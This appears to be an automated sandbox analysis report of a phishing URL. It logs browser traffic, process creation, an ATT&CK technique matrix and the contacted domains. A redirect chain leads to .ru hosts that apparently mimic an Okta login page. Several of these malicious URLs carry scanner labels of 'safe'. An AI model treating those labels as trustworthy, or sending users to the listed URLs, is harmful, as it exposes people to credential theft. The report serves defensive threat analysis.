              Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
              Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
              Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
              Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49828
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
              Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
              Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
              Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
              Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
              Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
              Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
              Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
              Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
              Source: unknownNetwork traffic detected: HTTP traffic on port 49679 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
              Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49671 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
              Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
              Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
              Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
              Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
              Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
              Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
              Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
              Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
              Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
              Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
              Source: unknownHTTPS traffic detected: 172.217.165.132:443 -> 192.168.2.16:49702 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 162.0.235.11:443 -> 192.168.2.16:49707 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 162.0.235.11:443 -> 192.168.2.16:49706 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 142.250.64.100:443 -> 192.168.2.16:49712 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 142.250.81.228:443 -> 192.168.2.16:49714 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 142.250.65.196:443 -> 192.168.2.16:49732 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 142.250.64.100:443 -> 192.168.2.16:49752 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.47.176:443 -> 192.168.2.16:49755 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.47.176:443 -> 192.168.2.16:49754 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 151.101.2.137:443 -> 192.168.2.16:49756 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 35.190.80.1:443 -> 192.168.2.16:49758 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.219.43:443 -> 192.168.2.16:49760 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.53.220:443 -> 192.168.2.16:49763 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.47.176:443 -> 192.168.2.16:49767 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.17.24.14:443 -> 192.168.2.16:49770 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.47.176:443 -> 192.168.2.16:49771 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 140.82.113.4:443 -> 192.168.2.16:49781 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 18.164.124.11:443 -> 192.168.2.16:49782 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 18.164.124.11:443 -> 192.168.2.16:49784 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 18.164.124.11:443 -> 192.168.2.16:49783 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.16:49788 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 18.164.124.11:443 -> 192.168.2.16:49789 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.47.176:443 -> 192.168.2.16:49814 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 35.190.80.1:443 -> 192.168.2.16:49827 version: TLS 1.2
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\scoped_dir6340_934371317
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile deleted: C:\Windows\SystemTemp\scoped_dir6340_934371317
              Source: classification engineClassification label: mal100.phis.evad.win@25/48@66/231
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Program Files\Google\Chrome\Application\Dictionaries
              Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1992,i,727462187047883651,15447064397842192856,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2200 /prefetch:3
              Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.google.com/url?q=https%3A%2F%2Fessaystoolkit.com%2Fsector&sa=D&sntz=1&usg=AOvVaw3ATSMSB0528phcgCi4pOKj&af6pbi8nqbgwu55cw518lklmc8rlvoy3529l3qOWAXRM0I9djvzki8kdrm19expwx==gXGKj7fHmzWdkj2fwKEGO6dPY7Z5PPVc3m4uU~JQ~1pwu5ro8b7dregga8ni8pcjy70e8jw2c#~JQ~LXGhAFK67Ngt8OgVyICJaqw7ha7==afV0FL0LY5RCvaMaS680fdF7POr"
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1992,i,727462187047883651,15447064397842192856,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2200 /prefetch:3
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\Google\Chrome\Application\Dictionaries

              Malware Analysis System Evasion

              barindex
              Source: Yara matchFile source: 2.16.d.script.csv, type: HTML
              Source: Yara matchFile source: 3.27..script.csv, type: HTML
              Source: Yara matchFile source: 3.28..script.csv, type: HTML
              Source: Yara matchFile source: 3.12.pages.csv, type: HTML
              Source: Yara matchFile source: 3.13.pages.csv, type: HTML
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity Information1
              Scripting
              Valid AccountsWindows Management Instrumentation1
              Browser Extensions
              1
              Process Injection
              12
              Masquerading
              OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
              Encrypted Channel
              Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault AccountsScheduled Task/Job1
              Scripting
              1
              Extra Window Memory Injection
              1
              Process Injection
              LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
              Non-Application Layer Protocol
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
              Deobfuscate/Decode Files or Information
              Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
              Application Layer Protocol
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
              File Deletion
              NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
              Ingress Tool Transfer
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Extra Window Memory Injection
              LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              https://www.google.com/url?q=https%3A%2F%2Fessaystoolkit.com%2Fsector&sa=D&sntz=1&usg=AOvVaw3ATSMSB0528phcgCi4pOKj&af6pbi8nqbgwu55cw518lklmc8rlvoy3529l3qOWAXRM0I9djvzki8kdrm19expwx==gXGKj7fHmzWdkj2fwKEGO6dPY7Z5PPVc3m4uU~JQ~1pwu5ro8b7dregga8ni8pcjy70e8jw2c#~JQ~LXGhAFK67Ngt8OgVyICJaqw7ha7==afV0FL0LY5RCvaMaS680fdF7POr0%Avira URL Cloudsafe
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              https://essaystoolkit.com/sector/0%Avira URL Cloudsafe
              https://essaystoolkit.com/sector0%Avira URL Cloudsafe
              https://www.google.com/recaptcha/api2/anchor?ar=1&k=6Ld2a_8qAAAAAEWn30aGX-jXM4Ke7jhFjq2P_cil&co=aHR0cHM6Ly9lc3NheXN0b29sa2l0LmNvbTo0NDM.&hl=en&v=bUO1BXI8H9PgjAPSW9hwuSeI&size=normal&cb=2rirk35zck5i0%Avira URL Cloudsafe
              https://www.google.com/recaptcha/api2/reload?k=6Ld2a_8qAAAAAEWn30aGX-jXM4Ke7jhFjq2P_cil0%Avira URL Cloudsafe
              https://www.google.com/recaptcha/api2/bframe?hl=en&v=bUO1BXI8H9PgjAPSW9hwuSeI&k=6Ld2a_8qAAAAAEWn30aGX-jXM4Ke7jhFjq2P_cil0%Avira URL Cloudsafe
              https://www.google.com/recaptcha/api2/payload?p=06AFcWeA7RJtq4W7dm7kaMTxtn8NggAmAvbiprzXKjhbiJwD7SYiiY-Kx8-EBm1JR2uNfcCNkgFERzEEJv8pgriiLM80zAjRNF9j_F9KSNcovPIyw9e6GToinS0ZtWwJCsh0fjSpFpnFhQ50CKVbTdAIwkqzNxFXSrJ52epVtdHeVnFQpySsb9vvxfe4Ur2NzA-Wla6xdJS62a&k=6Ld2a_8qAAAAAEWn30aGX-jXM4Ke7jhFjq2P_cil0%Avira URL Cloudsafe
              https://www.google.com/recaptcha/api2/payload?p=06AFcWeA7RJtq4W7dm7kaMTxtn8NggAmAvbiprzXKjhbiJwD7SYiiY-Kx8-EBm1JR2uNfcCNkgFERzEEJv8pgriiLM80zAjRNF9j_F9KSNcovPIyw9e6GToinS0ZtWwJCsh0fjSpFpnFhQ50CKVbTdAIwkqzNxFXSrJ52epVtdHeVnFQpySsb9vvxfe4Ur2NzA-Wla6xdJS62a&k=6Ld2a_8qAAAAAEWn30aGX-jXM4Ke7jhFjq2P_cil&id=20%Avira URL Cloudsafe
              https://www.google.com/recaptcha/api2/replaceimage?k=6Ld2a_8qAAAAAEWn30aGX-jXM4Ke7jhFjq2P_cil0%Avira URL Cloudsafe
              https://essaystoolkit.com/favicon.ico0%Avira URL Cloudsafe
              https://www.google.com/recaptcha/api2/userverify?k=6Ld2a_8qAAAAAEWn30aGX-jXM4Ke7jhFjq2P_cil0%Avira URL Cloudsafe
              https://www.google.com/recaptcha/api2/payload?p=06AFcWeA5f9HoPutYyBT2qwEzJOsT6nG8YNTH3FZDW5KtKfrt7YciDGcNlchkbD0_x8edYD-TcJd2wYLmh26nPsdqIRSCUUdq9JHHfbd68pFcR4xnRXC4q9ZJTxEF4wZy_Oz5Ga8FjwRu0iVk7vIeH8bkkLeQ8mRemJu5S9MIXNu1kc-PqZ79aRRIMGVUXtvyrdHSEwliq6Kl-&k=6Ld2a_8qAAAAAEWn30aGX-jXM4Ke7jhFjq2P_cil0%Avira URL Cloudsafe
              https://www.google.com/recaptcha/api2/clr?k=6Ld2a_8qAAAAAEWn30aGX-jXM4Ke7jhFjq2P_cil0%Avira URL Cloudsafe
              https://s1m0b.aezeib.ru/pani$m01ee0%Avira URL Cloudsafe
              https://a.nel.cloudflare.com/report/v4?s=5L4RBB7WM5XxbOSAYG%2FHSK7HxE64Fmzky9DQCXaOTMII2bcBVjDebfjadbnEw6zWjvJpZfyLI8rmCdbvdakNNA2IVbrKiMM9%2BabL2MI589aIeMGT%2F7fPgl3zuIu10%Avira URL Cloudsafe
              https://ed47.eqgegucq.ru/favicon.ico0%Avira URL Cloudsafe
              https://ed47.eqgegucq.ru/yc2BMfvrjsNeHhhExdlRWW6PfXjd9Ovl40%Avira URL Cloudsafe
              https://ed47.eqgegucq.ru/mn4L6GOLUlZagYCbsT3n6wqLN3uvB4LSfOCpkdoB6H901500%Avira URL Cloudsafe
              https://ed47.eqgegucq.ru/yzdQtVS4GZ6E51fEe1WiaTcO2T94coK4b5rsvJmFyXkpoAHmVSFi3h9nbLL1XtW901790%Avira URL Cloudsafe
              https://ed47.eqgegucq.ru/GDSherpa-bold.woff20%Avira URL Cloudsafe
              https://ed47.eqgegucq.ru/565DjQ1Ra2l4xoaZFArRnnwo5VzkldbbbqJ2d11vApKI671080%Avira URL Cloudsafe
              https://ed47.eqgegucq.ru/GDSherpa-regular.woff20%Avira URL Cloudsafe
              https://ed47.eqgegucq.ru/kl3OQPVclSq17SCChDj1jr79iwxalfvR1OKgPc5D4jl1dD561670%Avira URL Cloudsafe
              https://ed47.eqgegucq.ru/xyu8eLPpqmTcd300%Avira URL Cloudsafe
              https://ed47.eqgegucq.ru/GDSherpa-bold.woff0%Avira URL Cloudsafe
              https://ed47.eqgegucq.ru/ngy9O25NEgd0S2DtU5044Y8ilFjMH8XIC0d7bifESr351hUI6H320%Avira URL Cloudsafe
              https://ed47.eqgegucq.ru/wxkWLQweY9Qg0L5nCd2X623j9opsekGix38GhVF7Lj341300%Avira URL Cloudsafe
              https://ed47.eqgegucq.ru/GDSherpa-regular.woff0%Avira URL Cloudsafe
              https://ed47.eqgegucq.ru/opRDfkOXrsMnYvNNx4dtbnUz3oOQk0WOw2mn2kCcuGj6JmwznBcacfAn451400%Avira URL Cloudsafe
              https://ed47.eqgegucq.ru/ijxbIFM35ef0YB7ynrIMZkoZM73so5LWwiopAFQMb2gqvNqDiWbmViQTZH9xYRvr6Uh1Y3ab2300%Avira URL Cloudsafe
              https://ed47.eqgegucq.ru/klYU2PKXiTJDrNtGHGVk9e7Tkij8GMA4mghRT2jIQVkqXsQEH35qpnwx2190%Avira URL Cloudsafe
              https://ed47.eqgegucq.ru/uvd1XeC5IsiSnaDxxuNG8lpJEX5UxzJAf4otlN7vDS2u3CABSGw45XaOkspaLLc8o42Syl59Zef2580%Avira URL Cloudsafe
              https://ed47.eqgegucq.ru/34mdHVcd0wRK589200%Avira URL Cloudsafe
              https://ed47.eqgegucq.ru/ijCxaVGhkfmp1IvBSHDQBCoAux104p5ScooPmnQKESTK6WeHwBmmNvbUyuaqef2050%Avira URL Cloudsafe
              https://ed47.eqgegucq.ru/GDSherpa-vf2.woff20%Avira URL Cloudsafe
              https://ed47.eqgegucq.ru/zcpJU9RLzEotRfw1OKHO7Ow0ulS8Eg1wjEd1tPuSmTOegy0%Avira URL Cloudsafe
              https://ed47.eqgegucq.ru/rsTLp2CToreFE8klRPbyfp7Weuvkad8OQ49Wh538NV5jvMGQcd1990%Avira URL Cloudsafe
              https://ed47.eqgegucq.ru/GDSherpa-vf.woff20%Avira URL Cloudsafe
              https://ed47.eqgegucq.ru/ophWiuhE9GhMo1Iuc1EtOZmJk6WgA6klGn5stqM5NxIPbKQjpaJ8Kuvc7difuAmcd2330%Avira URL Cloudsafe
              https://a.nel.cloudflare.com/report/v4?s=2%2FlJZcda6w8M%2B7Ms7v4w%2BCrPZ2ge%2BxQ%2F6nLDMxIdzxRHR6QTsmFgAa9KAgSchYk8k2s3E9bM6f%2FY9uEcxO9H%2BeAJnsOPizfPMLheH0TyWHOP2IkB7uo%2FxrH5ztCc0%Avira URL Cloudsafe
              https://a.nel.cloudflare.com/report/v4?s=1fnEOnyasn%2FasDyloS90M%2Fs4eFZjmAplsRZPXkVGWuJmCLFITiDr1zRJhvGu6Urdz0QIeTrFeWBDLfXZk3Ch87vwETjK3ZHUjm10G6XwvHKW%2FCCS75xEut0ZELHJ0%Avira URL Cloudsafe
              NameIPActiveMaliciousAntivirus DetectionReputation
              beacons3.gvt2.com
              142.251.40.163
              truefalse
                high
                a.nel.cloudflare.com
                35.190.80.1
                truefalse
                  high
                  github.com
                  140.82.113.4
                  truefalse
                    high
                    beacons-handoff.gcp.gvt2.com
                    108.177.122.94
                    truefalse
                      high
                      beacons2.gvt2.com
                      216.239.32.3
                      truefalse
                        high
                        ed47.eqgegucq.ru
                        104.21.47.176
                        truetrue
                          unknown
                          beacons.gvt2.com
                          173.194.219.94
                          truefalse
                            high
                            code.jquery.com
                            151.101.2.137
                            truefalse
                              high
                              cdnjs.cloudflare.com
                              104.17.24.14
                              truefalse
                                high
                                www.google.com
                                172.217.165.132
                                truefalse
                                  high
                                  s1m0b.aezeib.ru
                                  172.67.219.43
                                  truefalse
                                    unknown
                                    d19d360lklgih4.cloudfront.net
                                    18.164.124.11
                                    truefalse
                                      high
                                      objects.githubusercontent.com
                                      185.199.109.133
                                      truefalse
                                        high
                                        essaystoolkit.com
                                        162.0.235.11
                                        truefalse
                                          unknown
                                          beacons.gcp.gvt2.com
                                          unknown
                                          unknownfalse
                                            high
                                            ok4static.oktacdn.com
                                            unknown
                                            unknownfalse
                                              high
                                              NameMaliciousAntivirus DetectionReputation
                                              https://ok4static.oktacdn.com/fs/bcg/4/gfsh9pi7jcWKJKMAs1t7false
                                                high
                                                https://ed47.eqgegucq.ru/kl3OQPVclSq17SCChDj1jr79iwxalfvR1OKgPc5D4jl1dD56167false
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://code.jquery.com/jquery-3.6.0.min.jsfalse
                                                  high
                                                  https://a.nel.cloudflare.com/report/v4?s=2%2FlJZcda6w8M%2B7Ms7v4w%2BCrPZ2ge%2BxQ%2F6nLDMxIdzxRHR6QTsmFgAa9KAgSchYk8k2s3E9bM6f%2FY9uEcxO9H%2BeAJnsOPizfPMLheH0TyWHOP2IkB7uo%2FxrH5ztCcfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://ed47.eqgegucq.ru/GDSherpa-bold.woff2false
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://www.google.com/recaptcha/api2/bframe?hl=en&v=bUO1BXI8H9PgjAPSW9hwuSeI&k=6Ld2a_8qAAAAAEWn30aGX-jXM4Ke7jhFjq2P_cilfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://essaystoolkit.com/sector/false
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://ed47.eqgegucq.ru/ngy9O25NEgd0S2DtU5044Y8ilFjMH8XIC0d7bifESr351hUI6H32false
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://www.google.com/recaptcha/api2/payload?p=06AFcWeA5f9HoPutYyBT2qwEzJOsT6nG8YNTH3FZDW5KtKfrt7YciDGcNlchkbD0_x8edYD-TcJd2wYLmh26nPsdqIRSCUUdq9JHHfbd68pFcR4xnRXC4q9ZJTxEF4wZy_Oz5Ga8FjwRu0iVk7vIeH8bkkLeQ8mRemJu5S9MIXNu1kc-PqZ79aRRIMGVUXtvyrdHSEwliq6Kl-&k=6Ld2a_8qAAAAAEWn30aGX-jXM4Ke7jhFjq2P_cilfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://ed47.eqgegucq.ru/GDSherpa-bold.wofffalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://ed47.eqgegucq.ru/GDSherpa-regular.wofffalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://ed47.eqgegucq.ru/SaqM/true
                                                    unknown
                                                    https://ed47.eqgegucq.ru/opRDfkOXrsMnYvNNx4dtbnUz3oOQk0WOw2mn2kCcuGj6JmwznBcacfAn45140false
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    https://ok4static.oktacdn.com/assets/loginpage/css/loginpage-theme.e0d37a504604ef874bad26435d62011f.cssfalse
